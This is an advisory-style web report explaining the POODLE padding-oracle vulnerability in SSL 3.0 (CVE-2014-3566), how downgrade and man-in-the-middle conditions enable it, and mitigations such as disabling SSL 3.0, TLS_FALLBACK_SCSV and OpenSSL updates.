Poodlebleed.com LogoPoodlebleed.com

Poodle Vulnerability Report - SSL3

Info: 960 words (4 pages) Report
Last Edited: 29th Aug 2022 by David Norman

System Impacted

Secure Socket Layer (SSL) 3.0 with cipher-block chaining (CBC) mode cyphers may pose a vulnerability for systems and applications. However, with the POODLE (Padding Oracle On Downgraded Legacy Encryption) attack, one of the most plausible exploitation scenarios, is with the use of web browsers and web servers.

The POODLE attack can potentially be used to exploit some Transport Layer Security (TLS) implementations.


A design flaw was discovered in SSL 3.0's handling of block cypher mode padding, and US-CERT is aware of it. The POODLE attack shows how an attacker can take advantage of this weakness to crack an encrypted transaction's encryption and recover its contents.


The SSL 3.0 vulnerability is caused by the way certain types of encryption algorithms used by the SSL protocol encode blocks of data. The POODLE exploit forces the usage of SSL 3.0 by making use of the protocol version negotiation functionality included in SSL/TLS, and then makes use of this fresh vulnerability to decrypt a subset of the SSL session's data. A lot of connections between the client and server are generated during the byte-by-byte decryption process.

Although TLS has mostly supplanted SSL 3.0 as the industry's preferred encryption protocol, most SSL/TLS implementations still support SSL 3.0 in order to maintain seamless user interaction with legacy systems. The SSL/TLS protocol suite allows for protocol version negotiation (also known as the "downgrade dance" in other reports) even if a client and server support the same version of TLS. The POODLE attack takes advantage of the fact that servers fall back to earlier protocols like SSL 3.0 when an attempt at a secure connection fails. Once a connection has failed, an attacker can force the usage of SSL 3.0 and launch the new assault. [1]

For the POODLE attack to be effective, the following two prerequisites must be satisfied: Both the client side of the SSL connection and the output ciphertext must be visible to the attacker in order for them to be able to influence certain aspects of the attack. The most typical method of achieving these conditions is to act as a Man-in-the-Middle (MITM), which necessitates the use of an entirely different type of assault to gain that level of access.

Because of these factors, exploitation is not always successful. Some of those obstacles are eliminated in environments (like public WiFi) where MITM assaults are already more common than normal.

Some TLS implementations are also susceptible to the POODLE attack, it was revealed publicly on December 8, 2014 [2,3,4].


Any system or application that supports SSL 3.0 with CBC mode cyphers is vulnerable to the POODLE attack. It also includes any programme that either implements the SSL/TLS protocol suite directly or references a vulnerable SSL/TLS library, such as OpenSSL. This impacts the majority of modern browsers and websites. An attacker can access sensitive information passed during an encrypted web session, including passwords, cookies, and other authentication tokens, by taking advantage of this vulnerability in a likely web-based scenario. The attacker can then use this information to gain more extensive access to a website (impersonating that user, accessing database content, etc.).


Since the vulnerability in SSL 3.0 is inherent to the protocol, there is presently no remedy for it; nonetheless, the best workaround at this time is to disable SSL 3.0 support in system/application configurations.

One of the necessary conditions, TLS FALLBACK SCSV, was fixed by some of the same researchers that found the issue. This protocol addition prohibits MITM attackers from forcing a protocol downgrade.

The following updates are advised by OpenSSL because their most recent versions now include support for TLS FALLBACK SCSV: [5]

  • Users using OpenSSL 1.0.1 should update to 1.0.1j.
  • Users using OpenSSL 1.0.0 should update to 1.0.0o.
  • Users using OpenSSL 0.9.8 should update to 0.9.8zc.

To stop downgrade attacks, clients and servers must both implement TLS FALLBACK SCSV.

POODLE probably also has an impact on other SSL 3.0 implementations. For information, speak to your dealer. Additional vendor information might be found in the CERT Vulnerability Note VU#577193 or the National Vulnerability Database (NVD) entry for CVE-2014-3566 [6]. [7]

TLS implementations that are vulnerable must be updated. The NVD additionally includes vendor data as well as CVE ID designations. [8]


[1] This Poodle Bites: Exploiting The SSL Fallback

[2] The POODLE Bites Again

[3] TLS1.x padding vulnerability CVE-2014-8730

[4] A10 Security Advisory

[5] OpenSSL Security Advisory [15 Oct 2014]

[6] Vulnerability Summary for CVE-2014-3566

[7] CERT Vulnerability Note VU#577193


Cite This Article

To export a reference to this publication please select a referencing stye below: